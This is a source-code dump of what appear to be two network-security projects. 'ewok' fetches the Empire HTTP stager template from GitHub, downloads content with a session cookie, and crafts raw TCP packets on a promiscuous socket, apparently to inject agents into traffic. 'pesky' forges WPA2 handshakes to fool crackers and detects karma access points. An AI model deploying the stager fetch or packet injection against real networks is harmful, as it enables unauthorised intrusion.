LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | 36 | extern int verbose; 37 | extern char *interface; 38 | -------------------------------------------------------------------------------- /ewok/grabtemplate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "The template is python code. This script downloads and parses the code from github." 4 | 5 | if [ $# -ne 1 ] 6 | then 7 | echo "Usage:" 8 | echo $0 "" 9 | exit 10 | fi 11 | 12 | curl https://raw.githubusercontent.com/EmpireProject/Empire/master/data/agent/stagers/http.py | grep -v \# | grep -v -e '^$' > $1 13 | -------------------------------------------------------------------------------- /ewok/http.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #define _GNU_SOURCE 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include 53 | 54 | 55 | #include 56 | #include "network.h" 57 | 58 | 59 | struct MemoryStruct { 60 | char *memory; 61 | size_t size; 62 | }; 63 | 64 | static size_t 65 | WriteMemoryCallback(void *contents, size_t size, size_t nmemb, void *userp) 66 | { 67 | size_t realsize = size * nmemb; 68 | struct MemoryStruct *mem = (struct MemoryStruct *) userp; 69 | 70 | mem->memory = realloc(mem->memory, mem->size + realsize + 1); 71 | if (mem->memory == NULL) { 72 | /* out of memory! */ 73 | printf("not enough memory (realloc returned NULL)\n"); 74 | return 0; 75 | } 76 | 77 | memcpy(&(mem->memory[mem->size]), contents, realsize); 78 | mem->size += realsize; 79 | mem->memory[mem->size] = 0; 80 | 81 | return realsize; 82 | } 83 | 84 | // download a file to the heap 85 | // set *outbuf to that heap segment 86 | // return the size of the file 87 | // stole a lot of this code from libcurl docs 88 | int urltomem(char *url, char *cookie, uint8_t ** outbuf) 89 | { 90 | CURL *curl_handle; 91 | CURLcode res; 92 | struct MemoryStruct chunk; 93 | char *session; 94 | char *header = "session="; 95 | 96 | 97 | session = (char *) malloc(strlen(header) + strlen(cookie)); 98 | if (session == NULL) { 99 | perror("can't allocate memory"); 100 | exit(1); 101 | } 102 | 103 | sprintf(session, "session=%s", cookie); 104 | 105 | chunk.memory = malloc(1); 106 | if (chunk.memory == NULL) { 107 | perror("can't allocate memory"); 108 | exit(1); 109 | } 110 | chunk.size = 0; /* no data at this point */ 111 | 112 | curl_global_init(CURL_GLOBAL_ALL); 113 | 114 | /* init the curl session */ 115 | curl_handle = curl_easy_init(); 116 | 117 | /* specify URL to get */ 118 | curl_easy_setopt(curl_handle, CURLOPT_URL, url); 119 | 120 | /* send all data to this function */ 121 | curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, 122 | WriteMemoryCallback); 123 | 124 | /* we pass our 'chunk' struct to the callback function */ 125 | curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *) &chunk); 126 | 127 | /* some servers don't like requests that are made without a user-agent 128 | field, so we provide one */ 129 | curl_easy_setopt(curl_handle, CURLOPT_USERAGENT, 130 | "(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"); 131 | //curl_easy_setopt(curl_handle, CURLOPT_COOKIE, "session=oiq1A1dJGeDB2lxcYA1oqMMYy38="); 132 | 133 | curl_easy_setopt(curl_handle, CURLOPT_COOKIE, session); 134 | 135 | /* get it! */ 136 | res = curl_easy_perform(curl_handle); 137 | 138 | /* check for errors */ 139 | if (res != CURLE_OK) { 140 | fprintf(stderr, "curl_easy_perform() failed: %s\n", 141 | curl_easy_strerror(res)); 142 | } 143 | 144 | 145 | *outbuf = chunk.memory; 146 | curl_easy_cleanup(curl_handle); 147 | 148 | /* we're done with libcurl, so clean it up */ 149 | curl_global_cleanup(); 150 | 151 | return (chunk.size); 152 | } 153 | -------------------------------------------------------------------------------- /ewok/network.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include 46 | #include 47 | #include 48 | #include 49 | #include 50 | #include 51 | #include 52 | #include "network.h" 53 | #include "global.h" 54 | 55 | 56 | // resolve hostnames for DNS 57 | uint32_t resolveipv4(char *host) 58 | { 59 | uint32_t ip = 0x00000000; 60 | struct hostent *hp; 61 | 62 | ip = inet_addr(host); 63 | if (ip == INADDR_NONE) { 64 | #ifndef STATIC // gethostbyname() doesn't like static compilation 65 | hp = gethostbyname(host); 66 | if (hp != NULL) { 67 | memcpy(&ip, hp->h_addr, 4); 68 | } 69 | #endif 70 | } 71 | return (ip); 72 | } 73 | 74 | 75 | // return a raw socket in PROMISC mode 76 | int getrawsock(char *intname) 77 | { 78 | int sock; 79 | struct ifreq ifr; 80 | if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { 81 | perror("can't open raw socket"); 82 | exit(1); 83 | } 84 | memset(&ifr, 0x00, sizeof(struct ifreq)); 85 | strncpy(ifr.ifr_name, interface, IFNAMSIZ); 86 | if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0) { 87 | perror("can't get socket info"); 88 | exit(1); 89 | } 90 | ifr.ifr_flags |= IFF_PROMISC; 91 | if (ioctl(sock, SIOCSIFFLAGS, &ifr) < 0) { 92 | perror("can't set promic"); 93 | exit(1); 94 | } 95 | return (sock); 96 | } 97 | 98 | // apply an LPF filter to a socket for TCP packets from/to "ip" 99 | int filterIP(int sock, uint32_t ip) 100 | { 101 | int i; 102 | uint32_t placeholder = 0xb7b7b7b7; 103 | uint32_t *lookhere; 104 | struct sock_filter template[] = { // LPF filter for TCP packets 105 | {0x28, 0, 0, 0x0000000c}, 106 | {0x15, 0, 5, 0x00000800}, 107 | {0x20, 0, 0, 0x0000001e}, 108 | {0x15, 0, 3, placeholder}, 109 | {0x30, 0, 0, 0x00000017}, 110 | {0x15, 0, 1, 0x00000006}, 111 | {0x6, 0, 0, 0x0000ffff}, 112 | {0x6, 0, 0, 0x00000000}, 113 | }; 114 | struct sock_fprog fprog; 115 | struct sock_filter **fil; 116 | 117 | fil = (struct sock_filter **) malloc(sizeof(template)); 118 | if (fil == NULL) { 119 | perror("can't allocate memory"); 120 | exit(1); 121 | } 122 | memcpy(fil, template, sizeof(template)); 123 | 124 | 125 | // replace the "placeholder" with the IP you want 126 | lookhere = (uint32_t *) fil; 127 | for (i = 0; i < (sizeof(template) - sizeof(ip)); i++) { 128 | if (lookhere[i] == placeholder) { 129 | lookhere[i] = ip; 130 | } 131 | } 132 | 133 | fprog.len = sizeof(template) / sizeof(template[0]); 134 | fprog.filter = (struct sock_filter *) fil; 135 | setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); 136 | 137 | return (0); 138 | } 139 | 140 | 141 | 142 | 143 | // checksums for makeing packets 144 | u_int16_t in_cksum(u_int16_t * addr, int len) 145 | { 146 | register int nleft = len; 147 | register u_int16_t *w = addr; 148 | register int sum = 0; 149 | u_short answer = 0; 150 | 151 | while (nleft > 1) { 152 | sum += *w++; 153 | nleft -= 2; 154 | } 155 | 156 | if (nleft == 1) { 157 | *(u_char *) (&answer) = *(u_char *) w; 158 | sum += answer; 159 | } 160 | sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ 161 | sum += (sum >> 16); /* add carry */ 162 | answer = ~sum; /* truncate to 16 bits */ 163 | return (answer); 164 | } 165 | 166 | // send an individual TCP packet 167 | int sendtcp(u_int32_t s_ip, u_int32_t d_ip, u_int16_t sport, 168 | u_int16_t dport, unsigned char *buf, u_int16_t buflen, 169 | int seqoffset, int acknumber, uint16_t id, uint8_t flags) 170 | { 171 | struct iphdr *ip; 172 | struct tcphdr *tcp; 173 | struct sockaddr_in sin; 174 | struct pseudohdr *pseudo; 175 | unsigned char *pkt; 176 | int one = 1; 177 | int pktlen; 178 | int sock; 179 | 180 | pktlen = sizeof(struct iphdr) + sizeof(struct tcphdr) + buflen; 181 | 182 | pkt = (unsigned char *) malloc(pktlen); 183 | if (pkt == NULL) { 184 | perror("can't allocate memory"); 185 | exit(1); 186 | } 187 | memset(pkt, 0x00, pktlen); 188 | memcpy(pkt + sizeof(struct iphdr) + sizeof(struct tcphdr), buf, 189 | buflen); 190 | 191 | ip = (struct iphdr *) pkt; 192 | tcp = (struct tcphdr *) (pkt + sizeof(struct iphdr)); 193 | pseudo = 194 | (struct pseudohdr *) (pkt + (sizeof(struct iphdr) - 195 | sizeof(struct pseudohdr))); 196 | 197 | pseudo->saddr = s_ip; 198 | pseudo->daddr = d_ip; 199 | pseudo->protocol = 6; 200 | pseudo->len = htons(sizeof(struct tcphdr) + buflen); 201 | 202 | tcp = (struct tcphdr *) (pkt + sizeof(struct iphdr)); 203 | tcp->source = sport; 204 | tcp->dest = dport; 205 | tcp->seq = seqoffset; 206 | tcp->ack_seq = acknumber; 207 | tcp->th_flags = flags; 208 | tcp->window = htons(400); 209 | tcp->urg_ptr = 0; 210 | tcp->doff = 5; 211 | tcp->check = in_cksum((u_int16_t *) pseudo, (sizeof(struct tcphdr) + 212 | sizeof(struct pseudohdr) + 213 | buflen)); 214 | 215 | ip->saddr = s_ip; 216 | ip->daddr = d_ip; 217 | ip->version = 4; 218 | ip->ihl = 5; 219 | ip->ttl = 123; 220 | ip->tot_len = 221 | htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + buflen); 222 | ip->id = id; 223 | ip->protocol = 0x06; 224 | ip->check = 0; 225 | ip->check = in_cksum((u_int16_t *) pkt, sizeof(struct iphdr)); 226 | 227 | sin.sin_family = AF_INET; 228 | sin.sin_port = htons(dport); 229 | sin.sin_addr.s_addr = d_ip; 230 | 231 | sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); 232 | if (sock < 0) { 233 | perror("can't open socket"); 234 | exit(1); 235 | } 236 | 237 | if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) { 238 | perror("setting socket options"); 239 | exit(1); 240 | } 241 | if (sendto 242 | (sock, pkt, pktlen, 0, (struct sockaddr *) &sin, 243 | sizeof(struct sockaddr)) < 0) { 244 | perror("sending packet"); 245 | exit(1); 246 | } 247 | free(pkt); 248 | close(sock); 249 | return (0); 250 | } 251 | 252 | // rap the sendtcp() function to send larger bufffers 253 | int sendtcpdata(u_int32_t s_ip, u_int32_t d_ip, u_int16_t sport, 254 | u_int16_t dport, unsigned char *buf, u_int16_t buflen, 255 | int seqoffset, int acknumber, uint16_t id, uint8_t flags, 256 | int direction) 257 | { 258 | uint32_t i; 259 | // RFC879 says we can send up to 536 bytes in each packet. 260 | // 512 is easier to debug 261 | int segsize = 512; 262 | 263 | for (i = 0; i < buflen; i = i + segsize) { 264 | if ((i + segsize) > buflen) { 265 | segsize = (buflen - i); 266 | } 267 | sendtcp(s_ip, d_ip, sport, dport, (buf + i), segsize, 268 | (seqoffset + htonl(i)), acknumber, id, flags); 269 | } 270 | return (0); 271 | } 272 | -------------------------------------------------------------------------------- /ewok/network.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #define MAXPACKET 2048 34 | 35 | struct pseudohdr { 36 | uint32_t saddr; 37 | uint32_t daddr; 38 | uint8_t unused; 39 | uint8_t protocol; 40 | uint16_t len; 41 | }; 42 | -------------------------------------------------------------------------------- /pesky/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | CFLAGS = -Wall -O3 3 | PROGNAME = pesky.salad 4 | ALTPROGNAME = sol.salad 5 | 6 | 7 | default: prelim pesky.deps sol.deps 8 | 9 | prelim: 10 | $(CC) $(CFLAGS) -c getbssid.c 11 | $(CC) $(CFLAGS) -c eap.c 12 | $(CC) $(CFLAGS) -c rand.c 13 | $(CC) $(CFLAGS) -c network.c 14 | pesky.deps: 15 | $(CC) $(CFLAGS) getbssid.o network.o eap.o rand.o main.c -lcrypto -o $(PROGNAME) 16 | pesky: prelim pesky.deps 17 | 18 | sol.deps: 19 | $(CC) $(CFLAGS) -c sendproberequest.c 20 | $(CC) $(CFLAGS) sniffloop.c getbssid.o sendproberequest.o rand.o network.o -o $(ALTPROGNAME) -lpthread 21 | sol: prelim sol.deps 22 | 23 | 24 | clean: 25 | rm -f *.o $(PROGNAME) $(ALTPROGNAME) 26 | -------------------------------------------------------------------------------- /pesky/Readme.md: -------------------------------------------------------------------------------- 1 | There are two programs in this directory: 2 | 3 | 1) pesky - a tool for spoofing WPA2 "handshakes" with arbitrary passwords 4 | 5 | This tool fools WPA2 attack tools that sniff "handshakes" for offline 6 | brute-force recovery of the pre-shared key. 7 | 8 | 2) sol - a tool for the detection and hopeful disruption of "karma" attacks 9 | 10 | This tool spits out probe requests for randomly named wireless networks. 11 | Any AP that responds to these requests is assumed to be hostile. 12 | -------------------------------------------------------------------------------- /pesky/eap.c: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | #include 45 | #include "network.h" 46 | #include "eapmap.h" 47 | #include "rand.h" 48 | 49 | // calculates a 32 bit CRC for a given memory buffer 50 | // used for the last 4 bytes of the second EAP packet 51 | // stolen from here https://rosettacode.org/wiki/CRC-32#C 52 | uint32_t generatecrc32(uint32_t crc, uint8_t * buf, size_t len) { 53 | static uint32_t table[256]; 54 | static int have_table = 0; 55 | uint32_t rem; 56 | uint8_t octet; 57 | int i, j; 58 | uint8_t *p, *q; 59 | 60 | /* This check is not thread safe; there is no mutex. */ 61 | if (have_table == 0) { 62 | /* Calculate CRC table. */ 63 | for (i = 0; i < 256; i++) { 64 | rem = i; /* remainder from polynomial division */ 65 | for (j = 0; j < 8; j++) { 66 | if (rem & 1) { 67 | rem >>= 1; 68 | rem ^= 0xedb88320; 69 | } else 70 | rem >>= 1; 71 | } 72 | table[i] = rem; 73 | } 74 | have_table = 1; 75 | } 76 | 77 | crc = ~crc; 78 | q = buf + len; 79 | for (p = buf; p < q; p++) { 80 | octet = *p; /* Cast to unsigned octet. */ 81 | crc = (crc >> 8) ^ table[(crc & 0xff) ^ octet]; 82 | } 83 | return ~crc; 84 | } 85 | 86 | // makes the PTK for calculating the MIC 87 | // stolen from ettercap 88 | uint8_t *generatePTK(u_char * bssid, u_char * sta, u_char * pmk, 89 | u_char * snonce, u_char * anonce, uint16_t bits) { 90 | uint8_t i; 91 | unsigned int len; 92 | uint8_t buff[100]; 93 | unsigned char *kck; 94 | size_t offset = sizeof("Pairwise key expansion"); 95 | 96 | memset(buff, 0, 100); 97 | 98 | /* initialize the buffer */ 99 | memcpy(buff, "Pairwise key expansion", offset); 100 | 101 | /* Min(AA, SPA) || Max(AA, SPA) */ 102 | if (memcmp(sta, bssid, ETH_ADDR_LEN) < 0) { 103 | memcpy(buff + offset, sta, ETH_ADDR_LEN); 104 | memcpy(buff + offset + ETH_ADDR_LEN, bssid, ETH_ADDR_LEN); 105 | } else { 106 | memcpy(buff + offset, bssid, ETH_ADDR_LEN); 107 | memcpy(buff + offset + ETH_ADDR_LEN, sta, ETH_ADDR_LEN); 108 | } 109 | 110 | /* move after AA SPA */ 111 | offset += ETH_ADDR_LEN * 2; 112 | 113 | /* Min(ANonce,SNonce) || Max(ANonce,SNonce) */ 114 | if (memcmp(snonce, anonce, WPA_NONCE_LEN) < 0) { 115 | memcpy(buff + offset, snonce, WPA_NONCE_LEN); 116 | memcpy(buff + offset + WPA_NONCE_LEN, anonce, WPA_NONCE_LEN); 117 | } else { 118 | memcpy(buff + offset, anonce, WPA_NONCE_LEN); 119 | memcpy(buff + offset + WPA_NONCE_LEN, snonce, WPA_NONCE_LEN); 120 | } 121 | 122 | /* move after ANonce SNonce */ 123 | offset += WPA_NONCE_LEN * 2; 124 | kck = (unsigned char *) malloc(WPA_PTK_LEN); 125 | if (kck == NULL) { 126 | perror("can't allocate memory"); 127 | exit(1); 128 | } 129 | 130 | memset(kck, 0, WPA_PTK_LEN); 131 | 132 | /* generate the PTK */ 133 | for (i = 0; i < (bits + 159) / 160; i++) { 134 | buff[offset] = i; 135 | 136 | /* the buffer (ptk) is large enough (see declaration) */ 137 | HMAC(EVP_sha1(), pmk, WPA_KEY_LEN, buff, 100, kck + i * 20, &len); 138 | } 139 | 140 | return (kck); 141 | } 142 | 143 | // generates the PMK for calculating the MIC. 144 | // pass == network password 145 | // salt == ESSID or network name 146 | uint8_t *generatePMK(const char *pass, char *salt) { 147 | unsigned char digest[WPA_PMK_LEN]; 148 | uint8_t *pmk; 149 | 150 | pmk = (uint8_t *) malloc(WPA_PMK_LEN); 151 | if (pmk == NULL) { 152 | perror("can't allocate memory"); 153 | exit(1); 154 | } 155 | PKCS5_PBKDF2_HMAC_SHA1((char *) pass, strlen((char *) pass), 156 | (unsigned char *) salt, strlen(salt), 4096, 157 | WPA_PMK_LEN, digest); 158 | memcpy(pmk, digest, WPA_PMK_LEN); 159 | return (pmk); 160 | } 161 | 162 | // sends first and second EAP packets through an interface 163 | // in "monitor mode" 164 | // bssid == AP's MAC 165 | // supmac == client's MAC 166 | // essid == network name 167 | // psk == network password 168 | // intname == name of interface 169 | int sendeap(uint8_t * bssid, uint8_t * supmac, char *essid, 170 | char *psk, char *intname) { 171 | uint8_t *kck; 172 | uint8_t *pmk; 173 | uint8_t *mic; 174 | uint8_t *anonce; 175 | uint8_t *snonce; 176 | uint8_t *eapol1; 177 | uint8_t *eapol2; 178 | uint32_t eapol2CRC; 179 | 180 | // fill in values here 181 | anonce = (uint8_t *) malloc(LEN_NONCE); 182 | if (anonce == NULL) { 183 | perror("can't allocate memory"); 184 | exit(1); 185 | // outBytes == 32 186 | } 187 | snonce = (uint8_t *) malloc(LEN_NONCE); 188 | if (snonce == NULL) { 189 | perror("can't allocate memory"); 190 | exit(1); 191 | } 192 | fillbuf(anonce, LEN_NONCE); 193 | fillbuf(snonce, LEN_NONCE); 194 | 195 | // EAPOL1 is made here 196 | eapol1 = (uint8_t *) malloc(EAP1_SIZE); 197 | if (eapol1 == NULL) { 198 | perror("can't allocate memory"); 199 | exit(1); 200 | } 201 | // populate fields in EAPOL1 packet 202 | memcpy(eapol1, EAP1_TEMPLATE, EAP1_SIZE); 203 | memcpy(eapol1 + EAP1_OFFSET_SUPMAC, supmac, LEN_MAC); 204 | memcpy(eapol1 + EAP1_OFFSET_BSSID1, bssid, LEN_MAC); 205 | memcpy(eapol1 + EAP1_OFFSET_BSSID2, bssid, LEN_MAC); 206 | memcpy(eapol1 + EAP1_OFFSET_ANONCE, anonce, LEN_NONCE); 207 | // END EAPOL1 208 | 209 | 210 | // EAPOL2 is made here 211 | eapol2 = (uint8_t *) malloc(EAP2_SIZE); 212 | if (eapol2 == NULL) { 213 | perror("can't allocate memory"); 214 | exit(1); 215 | } 216 | // populate fields in EAPOL2 packet 217 | memcpy(eapol2, EAP2_TEMPLATE, EAP2_SIZE); 218 | memcpy(eapol2 + EAP2_OFFSET_SUPMAC, supmac, LEN_MAC); 219 | memcpy(eapol2 + EAP2_OFFSET_BSSID1, bssid, LEN_MAC); 220 | memcpy(eapol2 + EAP2_OFFSET_BSSID2, bssid, LEN_MAC); 221 | memcpy(eapol2 + EAP2_OFFSET_SNONCE, snonce, LEN_NONCE); 222 | 223 | // start calculating the MIC 224 | pmk = generatePMK(psk, (char *) essid); 225 | 226 | kck = generatePTK(bssid, supmac, pmk, anonce, snonce, 32); 227 | mic = 228 | HMAC(EVP_sha1(), kck, LEN_MIC, 229 | (uint8_t *) (eapol2 + EAP2_OFFSET_MIC_START), 230 | EAP2_OFFSET_MIC_STOP, NULL, NULL); 231 | // put the MIC in EAPOL2 232 | memcpy(eapol2 + EAP2_OFFSET_MIC, mic, LEN_MIC); 233 | // put the "frame check sequence" in EAPOL2 234 | eapol2CRC = 235 | generatecrc32(0, (eapol2 + EAP2_OFFSET_CRC_START), 236 | EAP2_OFFSET_CRC_STOP); 237 | memcpy((eapol2 + EAP2_OFFSET_CRC), &eapol2CRC, 4); 238 | // end EAPOL2 239 | 240 | sendframe(eapol1, EAP1_SIZE, intname); 241 | sendframe(eapol2, EAP2_SIZE, intname); 242 | free(kck); 243 | free(pmk); 244 | free(eapol1); 245 | free(eapol2); 246 | free(anonce); 247 | free(snonce); 248 | 249 | return (0); 250 | } 251 | -------------------------------------------------------------------------------- /pesky/eap.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | int sendeap(uint8_t * bssid, uint8_t * supmac, char *essid, 35 | char *psk, char *intname); 36 | -------------------------------------------------------------------------------- /pesky/eapmap.h: -------------------------------------------------------------------------------- 1 | /* 2 | BSD 3-Clause License 3 | 4 | Copyright (c) 2017, John Ventura 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | 